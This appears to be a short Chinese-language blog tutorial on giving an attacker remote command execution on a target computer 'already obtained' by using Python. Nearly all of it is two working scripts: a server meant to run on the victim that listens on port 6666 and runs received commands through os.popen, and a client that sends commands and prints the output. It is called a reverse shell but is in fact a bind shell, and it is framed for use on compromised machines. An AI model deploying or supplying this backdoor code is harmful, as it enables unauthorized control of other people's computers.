有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell
主要用到python os库和sokect库
这里的服务端在目标机上运行
from socket import * from os import * s =socket(AF_INET,SOCK_STREAM) # IVP4 寻址 tcp协议 s.bind(( '' ,6666)) # 补丁端口 s.listen(1) # 开始监听一个队列 while True: sock,addr =s.accept() # 返回两次 第一次返回连接地址 二 端口号 print ( ' 客户端: ' ,addr) while True: cmd =sock.recv(1024) # 缓存长度 接收传递过来 cmdstr= cmd.decode() if cmdstr== ' exit ' : print ( ' 客户端: ' ,addr, ' 关闭 ' ) sock.close() break result = popen(cmdstr).read() sock.send(result.encode()) s.close()
本机运行
from socket import * from os import * c =socket(AF_INET,SOCK_STREAM) # IVP4 寻址 tcp协议 c.connect(( ' 127.0.0.1 ' ,6666)) # 连接地址 while True: cmd =input( " cmd: " ) c.send(cmd.encode()) # 必须传递流 if cmd== ' exit ' : c.close() break data =c.recv(1014 ) print (data.decode())